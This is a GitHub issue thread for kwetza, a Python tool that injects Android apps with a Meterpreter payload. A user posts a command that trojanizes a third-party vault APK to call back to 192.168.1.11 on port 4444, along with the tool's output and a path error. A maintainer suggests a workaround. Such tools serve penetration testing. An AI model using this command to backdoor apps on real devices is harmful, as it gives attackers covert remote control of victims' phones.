sensepost / kwetza

Python script to inject existing Android applications with a Meterpreter payload.
GNU General Public License v2.0
629 stars 238 forks source link

!!! ERROR IN 'parseAndroidManifext' method #15

Closed Josue198s closed 7 years ago

Josue198s commented 7 years ago

The manifest file cant be found.

python kwetza.py Hide\ Photos\ \ Videos\ Vault\ Pro\ v1.0.0\ KatCore.apk 192.168.1.11 4444 yes

[+] MMMMMMMM KWETZA [] DECOMPILING TARGET APK [+] ENDPOINT IP: 192.168.1.11 [+] ENDPOINT PORT: 4444 [+] APKTOOL DECOMPILED SUCCESS [] BYTING COMMS... [*] ANALYZING ANDROID MANIFEST !!! ERROR IN 'parseAndroidManifext' method [Errno 2] No such file or directory: '/root/Desktop/Android_Hack/kwetza/Hide Photos Videos Vault Pro v1/AndroidManifest.xml'

Josue198s commented 7 years ago

that happens due to the spaces in the folder name of the APK.

brompwnie commented 7 years ago

Good day, This appears to be a bug in the script. To workaround this in the meantime, place your target APK in the same directory as Kwetza.py